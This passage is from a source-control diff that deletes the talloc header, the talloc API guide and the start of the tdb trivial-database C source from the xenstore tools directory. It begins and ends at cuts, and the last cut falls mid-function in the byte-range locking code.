_talloc_zero(ctx, size, __location__) - -#define talloc_zero_array(ctx, type, count) (type *)_talloc_zero_array(ctx, sizeof(type), count, #type) -#define talloc_array(ctx, type, count) (type *)_talloc_array(ctx, sizeof(type), count, #type) -#define talloc_array_size(ctx, size, count) _talloc_array(ctx, size, count, __location__) - -#define talloc_realloc(ctx, p, type, count) (type *)_talloc_realloc_array(ctx, p, sizeof(type), count, #type) -#define talloc_realloc_size(ctx, ptr, size) _talloc_realloc(ctx, ptr, size, __location__) - -#define talloc_memdup(t, p, size) _talloc_memdup(t, p, size, __location__) - -#define malloc_p(type) (type *)malloc(sizeof(type)) -#define malloc_array_p(type, count) (type *)realloc_array(NULL, sizeof(type), count) -#define realloc_p(p, type, count) (type *)realloc_array(p, sizeof(type), count) - -#if 0 -/* Not correct for Samba3. 
*/ -#define data_blob(ptr, size) data_blob_named(ptr, size, "DATA_BLOB: "__location__) -#define data_blob_talloc(ctx, ptr, size) data_blob_talloc_named(ctx, ptr, size, "DATA_BLOB: "__location__) -#define data_blob_dup_talloc(ctx, blob) data_blob_talloc_named(ctx, (blob)->data, (blob)->length, "DATA_BLOB: "__location__) -#endif - -#define talloc_set_type(ptr, type) talloc_set_name_const(ptr, #type) -#define talloc_get_type(ptr, type) (type *)talloc_check_name(ptr, #type) - -#define talloc_find_parent_bytype(ptr, type) (type *)talloc_find_parent_byname(ptr, #type) - - -#if TALLOC_DEPRECATED -#define talloc_zero_p(ctx, type) talloc_zero(ctx, type) -#define talloc_p(ctx, type) talloc(ctx, type) -#define talloc_array_p(ctx, type, count) talloc_array(ctx, type, count) -#define talloc_realloc_p(ctx, p, type, count) talloc_realloc(ctx, p, type, count) -#define talloc_destroy(ctx) talloc_free(ctx) -#endif - -#ifndef PRINTF_ATTRIBUTE -#if (__GNUC__ >= 3) -/** Use gcc attribute to check printf fns. a1 is the 1-based index of - * the parameter containing the format, and a2 the index of the first - * argument. Note that some gcc 2.x versions don't handle this - * properly **/ -#define PRINTF_ATTRIBUTE(a1, a2) __attribute__ ((format (__printf__, a1, a2))) -#else -#define PRINTF_ATTRIBUTE(a1, a2) -#endif -#endif - - -/* The following definitions come from talloc.c */ -void *_talloc(const void *context, size_t size); -void talloc_set_destructor(const void *ptr, int (*destructor)(void *)); -void talloc_increase_ref_count(const void *ptr); -void *talloc_reference(const void *context, const void *ptr); -int talloc_unlink(const void *context, void *ptr); -void talloc_set_name(const void *ptr, const char *fmt, ...) PRINTF_ATTRIBUTE(2,3); -void talloc_set_name_const(const void *ptr, const char *name); -void *talloc_named(const void *context, size_t size, - const char *fmt, ...) 
PRINTF_ATTRIBUTE(3,4); -void *talloc_named_const(const void *context, size_t size, const char *name); -const char *talloc_get_name(const void *ptr); -void *talloc_check_name(const void *ptr, const char *name); -void talloc_report_depth(const void *ptr, FILE *f, int depth); -void *talloc_parent(const void *ptr); -void *talloc_init(const char *fmt, ...) PRINTF_ATTRIBUTE(1,2); -int talloc_free(void *ptr); -void *_talloc_realloc(const void *context, void *ptr, size_t size, const char *name); -void *talloc_steal(const void *new_ctx, const void *ptr); -off_t talloc_total_size(const void *ptr); -off_t talloc_total_blocks(const void *ptr); -void talloc_report_full(const void *ptr, FILE *f); -void talloc_report(const void *ptr, FILE *f); -void talloc_enable_null_tracking(void); -void talloc_enable_leak_report(void); -void talloc_enable_leak_report_full(void); -void *_talloc_zero(const void *ctx, size_t size, const char *name); -void *_talloc_memdup(const void *t, const void *p, size_t size, const char *name); -char *talloc_strdup(const void *t, const char *p); -char *talloc_strndup(const void *t, const char *p, size_t n); -char *talloc_append_string(const void *t, char *orig, const char *append); -char *talloc_vasprintf(const void *t, const char *fmt, va_list ap) PRINTF_ATTRIBUTE(2,0); -char *talloc_asprintf(const void *t, const char *fmt, ...) PRINTF_ATTRIBUTE(2,3); -char *talloc_asprintf_append(char *s, - const char *fmt, ...) 
PRINTF_ATTRIBUTE(2,3); -void *_talloc_array(const void *ctx, size_t el_size, unsigned count, const char *name); -void *_talloc_zero_array(const void *ctx, size_t el_size, unsigned count, const char *name); -void *_talloc_realloc_array(const void *ctx, void *ptr, size_t el_size, unsigned count, const char *name); -void *talloc_realloc_fn(const void *context, void *ptr, size_t size); -void *talloc_autofree_context(void); -size_t talloc_get_size(const void *ctx); -void *talloc_find_parent_byname(const void *ctx, const char *name); -void talloc_show_parents(const void *context, FILE *file); - -#endif - diff -r 10a8fae412c5 tools/xenstore/talloc_guide.txt --- a/tools/xenstore/talloc_guide.txt Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,569 +0,0 @@ -Using talloc in Samba4 ----------------------- - -Andrew Tridgell -September 2004 - -The most current version of this document is available at - http://samba.org/ftp/unpacked/samba4/source/lib/talloc/talloc_guide.txt - -If you are used to talloc from Samba3 then please read this carefully, -as talloc has changed a lot. - -The new talloc is a hierarchical, reference counted memory pool system -with destructors. Quite a mounthful really, but not too bad once you -get used to it. - -Perhaps the biggest change from Samba3 is that there is no distinction -between a "talloc context" and a "talloc pointer". Any pointer -returned from talloc() is itself a valid talloc context. This means -you can do this: - - struct foo *X = talloc(mem_ctx, struct foo); - X->name = talloc_strdup(X, "foo"); - -and the pointer X->name would be a "child" of the talloc context "X" -which is itself a child of mem_ctx. So if you do talloc_free(mem_ctx) -then it is all destroyed, whereas if you do talloc_free(X) then just X -and X->name are destroyed, and if you do talloc_free(X->name) then -just the name element of X is destroyed. 
- -If you think about this, then what this effectively gives you is an -n-ary tree, where you can free any part of the tree with -talloc_free(). - -If you find this confusing, then I suggest you run the testsuite to -watch talloc in action. You may also like to add your own tests to -testsuite.c to clarify how some particular situation is handled. - - -Performance ------------ - -All the additional features of talloc() over malloc() do come at a -price. We have a simple performance test in Samba4 that measures -talloc() versus malloc() performance, and it seems that talloc() is -about 10% slower than malloc() on my x86 Debian Linux box. For Samba, -the great reduction in code complexity that we get by using talloc -makes this worthwhile, especially as the total overhead of -talloc/malloc in Samba is already quite small. - - -talloc API ----------- - -The following is a complete guide to the talloc API. Read it all at -least twice. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc(const void *context, type); - -The talloc() macro is the core of the talloc library. It takes a -memory context and a type, and returns a pointer to a new area of -memory of the given type. - -The returned pointer is itself a talloc context, so you can use it as -the context argument to more calls to talloc if you wish. - -The returned pointer is a "child" of the supplied context. This means -that if you talloc_free() the context then the new child disappears as -well. Alternatively you can free just the child. - -The context argument to talloc() can be NULL, in which case a new top -level context is created. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_size(const void *context, size_t size); - -The function talloc_size() should be used when you don't have a -convenient type to pass to talloc(). Unlike talloc(), it is not type -safe (as it returns a void *), so you are on your own for type checking. 
- - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -int talloc_free(void *ptr); - -The talloc_free() function frees a piece of talloc memory, and all its -children. You can call talloc_free() on any pointer returned by -talloc(). - -The return value of talloc_free() indicates success or failure, with 0 -returned for success and -1 for failure. The only possible failure -condition is if the pointer had a destructor attached to it and the -destructor returned -1. See talloc_set_destructor() for details on -destructors. - -If this pointer has an additional parent when talloc_free() is called -then the memory is not actually released, but instead the most -recently established parent is destroyed. See talloc_reference() for -details on establishing additional parents. - -For more control on which parent is removed, see talloc_unlink() - -talloc_free() operates recursively on its children. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -int talloc_free_children(void *ptr); - -The talloc_free_children() walks along the list of all children of a -talloc context and talloc_free()s only the children, not the context -itself. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_reference(const void *context, const void *ptr); - -The talloc_reference() function makes "context" an additional parent -of "ptr". - -The return value of talloc_reference() is always the original pointer -"ptr", unless talloc ran out of memory in creating the reference in -which case it will return NULL (each additional reference consumes -around 48 bytes of memory on intel x86 platforms). - -If "ptr" is NULL, then the function is a no-op, and simply returns NULL. - -After creating a reference you can free it in one of the following -ways: - - - you can talloc_free() any parent of the original pointer. 
That - will reduce the number of parents of this pointer by 1, and will - cause this pointer to be freed if it runs out of parents. - - - you can talloc_free() the pointer itself. That will destroy the - most recently established parent to the pointer and leave the - pointer as a child of its current parent. - -For more control on which parent to remove, see talloc_unlink() - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -int talloc_unlink(const void *context, const void *ptr); - -The talloc_unlink() function removes a specific parent from ptr. The -context passed must either be a context used in talloc_reference() -with this pointer, or must be a direct parent of ptr. - -Note that if the parent has already been removed using talloc_free() -then this function will fail and will return -1. Likewise, if "ptr" -is NULL, then the function will make no modifications and return -1. - -Usually you can just use talloc_free() instead of talloc_unlink(), but -sometimes it is useful to have the additional control on which parent -is removed. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_set_destructor(const void *ptr, int (*destructor)(void *)); - -The function talloc_set_destructor() sets the "destructor" for the -pointer "ptr". A destructor is a function that is called when the -memory used by a pointer is about to be released. The destructor -receives the pointer as an argument, and should return 0 for success -and -1 for failure. - -The destructor can do anything it wants to, including freeing other -pieces of memory. A common use for destructors is to clean up -operating system resources (such as open file descriptors) contained -in the structure the destructor is placed on. - -You can only place one destructor on a pointer. If you need more than -one destructor then you can create a zero-length child of the pointer -and place an additional destructor on that. 
- -To remove a destructor call talloc_set_destructor() with NULL for the -destructor. - -If your destructor attempts to talloc_free() the pointer that it is -the destructor for then talloc_free() will return -1 and the free will -be ignored. This would be a pointless operation anyway, as the -destructor is only called when the memory is just about to go away. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_increase_ref_count(const void *ptr); - -The talloc_increase_ref_count(ptr) function is exactly equivalent to: - - talloc_reference(NULL, ptr); - -You can use either syntax, depending on which you think is clearer in -your code. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_set_name(const void *ptr, const char *fmt, ...); - -Each talloc pointer has a "name". The name is used principally for -debugging purposes, although it is also possible to set and get the -name on a pointer in as a way of "marking" pointers in your code. - -The main use for names on pointer is for "talloc reports". See -talloc_report() and talloc_report_full() for details. Also see -talloc_enable_leak_report() and talloc_enable_leak_report_full(). - -The talloc_set_name() function allocates memory as a child of the -pointer. It is logically equivalent to: - talloc_set_name_const(ptr, talloc_asprintf(ptr, fmt, ...)); - -Note that multiple calls to talloc_set_name() will allocate more -memory without releasing the name. All of the memory is released when -the ptr is freed using talloc_free(). - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_set_name_const(const void *ptr, const char *name); - -The function talloc_set_name_const() is just like talloc_set_name(), -but it takes a string constant, and is much faster. It is extensively -used by the "auto naming" macros, such as talloc_p(). - -This function does not allocate any memory. 
It just copies the -supplied pointer into the internal representation of the talloc -ptr. This means you must not pass a name pointer to memory that will -disappear before the ptr is freed with talloc_free(). - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_named(const void *context, size_t size, const char *fmt, ...); - -The talloc_named() function creates a named talloc pointer. It is -equivalent to: - - ptr = talloc_size(context, size); - talloc_set_name(ptr, fmt, ....); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_named_const(const void *context, size_t size, const char *name); - -This is equivalent to: - - ptr = talloc_size(context, size); - talloc_set_name_const(ptr, name); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -const char *talloc_get_name(const void *ptr); - -This returns the current name for the given talloc pointer. See -talloc_set_name() for details. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_init(const char *fmt, ...); - -This function creates a zero length named talloc context as a top -level context. It is equivalent to: - - talloc_named(NULL, 0, fmt, ...); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_new(void *ctx); - -This is a utility macro that creates a new memory context hanging -off an exiting context, automatically naming it "talloc_new: __location__" -where __location__ is the source line it is called from. It is -particularly useful for creating a new temporary working context. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc_realloc(const void *context, void *ptr, type, count); - -The talloc_realloc() macro changes the size of a talloc -pointer. The "count" argument is the number of elements of type "type" -that you want the resulting pointer to hold. 
- -talloc_realloc() has the following equivalences: - - talloc_realloc(context, NULL, type, 1) ==> talloc(context, type); - talloc_realloc(context, NULL, type, N) ==> talloc_array(context, type, N); - talloc_realloc(context, ptr, type, 0) ==> talloc_free(ptr); - -The "context" argument is only used if "ptr" is not NULL, otherwise it -is ignored. - -talloc_realloc() returns the new pointer, or NULL on failure. The call -will fail either due to a lack of memory, or because the pointer has -more than one parent (see talloc_reference()). - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_realloc_size(const void *context, void *ptr, size_t size); - -the talloc_realloc_size() function is useful when the type is not -known so the typesafe talloc_realloc() cannot be used. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_steal(const void *new_ctx, const void *ptr); - -The talloc_steal() function changes the parent context of a talloc -pointer. It is typically used when the context that the pointer is -currently a child of is going to be freed and you wish to keep the -memory for a longer time. - -The talloc_steal() function returns the pointer that you pass it. It -does not have any failure modes. - -NOTE: It is possible to produce loops in the parent/child relationship -if you are not careful with talloc_steal(). No guarantees are provided -as to your sanity or the safety of your data if you do this. - -talloc_steal (new_ctx, NULL) will return NULL with no sideeffects. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -off_t talloc_total_size(const void *ptr); - -The talloc_total_size() function returns the total size in bytes used -by this pointer and all child pointers. Mostly useful for debugging. - -Passing NULL is allowed, but it will only give a meaningful result if -talloc_enable_leak_report() or talloc_enable_leak_report_full() has -been called. 
- - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -off_t talloc_total_blocks(const void *ptr); - -The talloc_total_blocks() function returns the total memory block -count used by this pointer and all child pointers. Mostly useful for -debugging. - -Passing NULL is allowed, but it will only give a meaningful result if -talloc_enable_leak_report() or talloc_enable_leak_report_full() has -been called. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_report(const void *ptr, FILE *f); - -The talloc_report() function prints a summary report of all memory -used by ptr. One line of report is printed for each immediate child of -ptr, showing the total memory and number of blocks used by that child. - -You can pass NULL for the pointer, in which case a report is printed -for the top level memory context, but only if -talloc_enable_leak_report() or talloc_enable_leak_report_full() has -been called. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_report_full(const void *ptr, FILE *f); - -This provides a more detailed report than talloc_report(). It will -recursively print the ensire tree of memory referenced by the -pointer. References in the tree are shown by giving the name of the -pointer that is referenced. - -You can pass NULL for the pointer, in which case a report is printed -for the top level memory context, but only if -talloc_enable_leak_report() or talloc_enable_leak_report_full() has -been called. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_enable_leak_report(void); - -This enables calling of talloc_report(NULL, stderr) when the program -exits. In Samba4 this is enabled by using the --leak-report command -line option. - -For it to be useful, this function must be called before any other -talloc function as it establishes a "null context" that acts as the -top of the tree. 
If you don't call this function first then passing -NULL to talloc_report() or talloc_report_full() won't give you the -full tree printout. - -Here is a typical talloc report: - -talloc report on 'null_context' (total 267 bytes in 15 blocks) - libcli/auth/spnego_parse.c:55 contains 31 bytes in 2 blocks - libcli/auth/spnego_parse.c:55 contains 31 bytes in 2 blocks - iconv(UTF8,CP850) contains 42 bytes in 2 blocks - libcli/auth/spnego_parse.c:55 contains 31 bytes in 2 blocks - iconv(CP850,UTF8) contains 42 bytes in 2 blocks - iconv(UTF8,UTF-16LE) contains 45 bytes in 2 blocks - iconv(UTF-16LE,UTF8) contains 45 bytes in 2 blocks - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_enable_leak_report_full(void); - -This enables calling of talloc_report_full(NULL, stderr) when the -program exits. In Samba4 this is enabled by using the ---leak-report-full command line option. - -For it to be useful, this function must be called before any other -talloc function as it establishes a "null context" that acts as the -top of the tree. If you don't call this function first then passing -NULL to talloc_report() or talloc_report_full() won't give you the -full tree printout. - -Here is a typical full report: - -full talloc report on 'root' (total 18 bytes in 8 blocks) - p1 contains 18 bytes in 7 blocks (ref 0) - r1 contains 13 bytes in 2 blocks (ref 0) - reference to: p2 - p2 contains 1 bytes in 1 blocks (ref 1) - x3 contains 1 bytes in 1 blocks (ref 0) - x2 contains 1 bytes in 1 blocks (ref 0) - x1 contains 1 bytes in 1 blocks (ref 0) - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_enable_null_tracking(void); - -This enables tracking of the NULL memory context without enabling leak -reporting on exit. 
Useful for when you want to do your own leak -reporting call via talloc_report_null_full(); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc_zero(const void *ctx, type); - -The talloc_zero() macro is equivalent to: - - ptr = talloc(ctx, type); - if (ptr) memset(ptr, 0, sizeof(type)); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_zero_size(const void *ctx, size_t size) - -The talloc_zero_size() function is useful when you don't have a known type - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_memdup(const void *ctx, const void *p, size_t size); - -The talloc_memdup() function is equivalent to: - - ptr = talloc_size(ctx, size); - if (ptr) memcpy(ptr, p, size); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_strdup(const void *ctx, const char *p); - -The talloc_strdup() function is equivalent to: - - ptr = talloc_size(ctx, strlen(p)+1); - if (ptr) memcpy(ptr, p, strlen(p)+1); - -This functions sets the name of the new pointer to the passed -string. This is equivalent to: - talloc_set_name_const(ptr, ptr) - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_strndup(const void *t, const char *p, size_t n); - -The talloc_strndup() function is the talloc equivalent of the C -library function strndup() - -This functions sets the name of the new pointer to the passed -string. 
This is equivalent to: - talloc_set_name_const(ptr, ptr) - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_vasprintf(const void *t, const char *fmt, va_list ap); - -The talloc_vasprintf() function is the talloc equivalent of the C -library function vasprintf() - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_asprintf(const void *t, const char *fmt, ...); - -The talloc_asprintf() function is the talloc equivalent of the C -library function asprintf() - -This functions sets the name of the new pointer to the passed -string. This is equivalent to: - talloc_set_name_const(ptr, ptr) - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_asprintf_append(char *s, const char *fmt, ...); - -The talloc_asprintf_append() function appends the given formatted -string to the given string. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc_array(const void *ctx, type, uint_t count); - -The talloc_array() macro is equivalent to: - - (type *)talloc_size(ctx, sizeof(type) * count); - -except that it provides integer overflow protection for the multiply, -returning NULL if the multiply overflows. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_array_size(const void *ctx, size_t size, uint_t count); - -The talloc_array_size() function is useful when the type is not -known. It operates in the same way as talloc_array(), but takes a size -instead of a type. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_realloc_fn(const void *ctx, void *ptr, size_t size); - -This is a non-macro version of talloc_realloc(), which is useful -as libraries sometimes want a ralloc function pointer. 
A realloc() -implementation encapsulates the functionality of malloc(), free() and -realloc() in one call, which is why it is useful to be able to pass -around a single function pointer. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_autofree_context(void); - -This is a handy utility function that returns a talloc context -which will be automatically freed on program exit. This can be used -to reduce the noise in memory leak reports. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_check_name(const void *ptr, const char *name); - -This function checks if a pointer has the specified name. If it does -then the pointer is returned. It it doesn't then NULL is returned. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc_get_type(const void *ptr, type); - -This macro allows you to do type checking on talloc pointers. It is -particularly useful for void* private pointers. It is equivalent to -this: - - (type *)talloc_check_name(ptr, #type) - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -talloc_set_type(const void *ptr, type); - -This macro allows you to force the name of a pointer to be a -particular type. This can be used in conjunction with -talloc_get_type() to do type checking on void* pointers. - -It is equivalent to this: - talloc_set_name_const(ptr, #type) - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -talloc_get_size(const void *ctx); - -This function lets you know the amount of memory alloced so far by -this context. It does NOT account for subcontext memory. -This can be used to calculate the size of an array. - diff -r 10a8fae412c5 tools/xenstore/tdb.c --- a/tools/xenstore/tdb.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,2151 +0,0 @@ - /* - Unix SMB/CIFS implementation. 
- - trivial database library - - Copyright (C) Andrew Tridgell 1999-2004 - Copyright (C) Paul `Rusty' Russell 2000 - Copyright (C) Jeremy Allison 2000-2003 - - ** NOTE! The following LGPL license applies to the tdb - ** library. This does NOT imply that all of Samba is released - ** under the LGPL - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - - -#ifndef _SAMBA_BUILD_ -#ifdef HAVE_CONFIG_H -#include -#endif - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include "tdb.h" -#include -#include "talloc.h" -#undef HAVE_MMAP -#else -#include "includes.h" -#include "lib/tdb/include/tdb.h" -#include "system/time.h" -#include "system/shmem.h" -#include "system/filesys.h" -#endif - -#define TDB_MAGIC_FOOD "TDB file\n" -#define TDB_VERSION (0x26011967 + 6) -#define TDB_MAGIC (0x26011999U) -#define TDB_FREE_MAGIC (~TDB_MAGIC) -#define TDB_DEAD_MAGIC (0xFEE1DEAD) -#define TDB_ALIGNMENT 4 -#define MIN_REC_SIZE (2*sizeof(struct list_struct) + TDB_ALIGNMENT) -#define DEFAULT_HASH_SIZE 131 -#define TDB_PAGE_SIZE 0x2000 -#define FREELIST_TOP (sizeof(struct tdb_header)) -#define TDB_ALIGN(x,a) (((x) + (a)-1) & ~((a)-1)) -#define TDB_BYTEREV(x) (((((x)&0xff)<<24)|((x)&0xFF00)<<8)|(((x)>>8)&0xFF00)|((x)>>24)) -#define TDB_DEAD(r) ((r)->magic == TDB_DEAD_MAGIC) 
-#define TDB_BAD_MAGIC(r) ((r)->magic != TDB_MAGIC && !TDB_DEAD(r)) -#define TDB_HASH_TOP(hash) (FREELIST_TOP + (BUCKET(hash)+1)*sizeof(tdb_off)) -#define TDB_DATA_START(hash_size) (TDB_HASH_TOP(hash_size-1)) - - -/* NB assumes there is a local variable called "tdb" that is the - * current context, also takes doubly-parenthesized print-style - * argument. */ -#define TDB_LOG(x) tdb->log_fn x - -/* lock offsets */ -#define GLOBAL_LOCK 0 -#define ACTIVE_LOCK 4 - -#ifndef MAP_FILE -#define MAP_FILE 0 -#endif - -#ifndef MAP_FAILED -#define MAP_FAILED ((void *)-1) -#endif - -#ifndef discard_const_p -# if defined(__intptr_t_defined) || defined(HAVE_INTPTR_T) -# define discard_const(ptr) ((void *)((intptr_t)(ptr))) -# else -# define discard_const(ptr) ((void *)(ptr)) -# endif -# define discard_const_p(type, ptr) ((type *)discard_const(ptr)) -#endif - -/* free memory if the pointer is valid and zero the pointer */ -#ifndef SAFE_FREE -#define SAFE_FREE(x) do { if ((x) != NULL) {talloc_free(discard_const_p(void *, (x))); (x)=NULL;} } while(0) -#endif - -#define BUCKET(hash) ((hash) % tdb->header.hash_size) -TDB_DATA tdb_null; - -/* all contexts, to ensure no double-opens (fcntl locks don't nest!) */ -static TDB_CONTEXT *tdbs = NULL; - -static int tdb_munmap(TDB_CONTEXT *tdb) -{ - if (tdb->flags & TDB_INTERNAL) - return 0; - -#ifdef HAVE_MMAP - if (tdb->map_ptr) { - int ret = munmap(tdb->map_ptr, tdb->map_size); - if (ret != 0) - return ret; - } -#endif - tdb->map_ptr = NULL; - return 0; -} - -static void tdb_mmap(TDB_CONTEXT *tdb) -{ - if (tdb->flags & TDB_INTERNAL) - return; - -#ifdef HAVE_MMAP - if (!(tdb->flags & TDB_NOMMAP)) { - tdb->map_ptr = mmap(NULL, tdb->map_size, - PROT_READ|(tdb->read_only? 0:PROT_WRITE), - MAP_SHARED|MAP_FILE, tdb->fd, 0); - - /* - * NB. When mmap fails it returns MAP_FAILED *NOT* NULL !!!! 
- */ - - if (tdb->map_ptr == MAP_FAILED) { - tdb->map_ptr = NULL; - TDB_LOG((tdb, 2, "tdb_mmap failed for size %d (%s)\n", - tdb->map_size, strerror(errno))); - } - } else { - tdb->map_ptr = NULL; - } -#else - tdb->map_ptr = NULL; -#endif -} - -/* Endian conversion: we only ever deal with 4 byte quantities */ -static void *convert(void *buf, uint32_t size) -{ - uint32_t i, *p = buf; - for (i = 0; i < size / 4; i++) - p[i] = TDB_BYTEREV(p[i]); - return buf; -} -#define DOCONV() (tdb->flags & TDB_CONVERT) -#define CONVERT(x) (DOCONV() ? convert(&x, sizeof(x)) : &x) - -/* the body of the database is made of one list_struct for the free space - plus a separate data list for each hash value */ -struct list_struct { - tdb_off next; /* offset of the next record in the list */ - tdb_len rec_len; /* total byte length of record */ - tdb_len key_len; /* byte length of key */ - tdb_len data_len; /* byte length of data */ - uint32_t full_hash; /* the full 32 bit hash of the key */ - uint32_t magic; /* try to catch errors */ - /* the following union is implied: - union { - char record[rec_len]; - struct { - char key[key_len]; - char data[data_len]; - } - uint32_t totalsize; (tailer) - } - */ -}; - -/* a byte range locking function - return 0 on success - this functions locks/unlocks 1 byte at the specified offset. - - On error, errno is also set so that errors are passed back properly - through tdb_open(). */ -static int tdb_brlock(TDB_CONTEXT *tdb, tdb_off offset, - int rw_type, int lck_type, int probe) -{ - struct flock fl; - int ret; - - if (tdb->flags & TDB_NOLOCK) - return 0; - if ((rw_type == F_WRLCK) && (tdb->read_only)) { - errno = EACCES; - return -1; - } - - fl.l_type = rw_type; - fl.l_whence = SEEK_SET; - fl.l_start = offset; - fl.l_len = 1; - fl.l_pid = 0; - - do { - ret = fcntl(tdb->fd,lck_type,&fl); - } while (ret == -1 && errno == EINTR); - - if (ret == -1) { - if 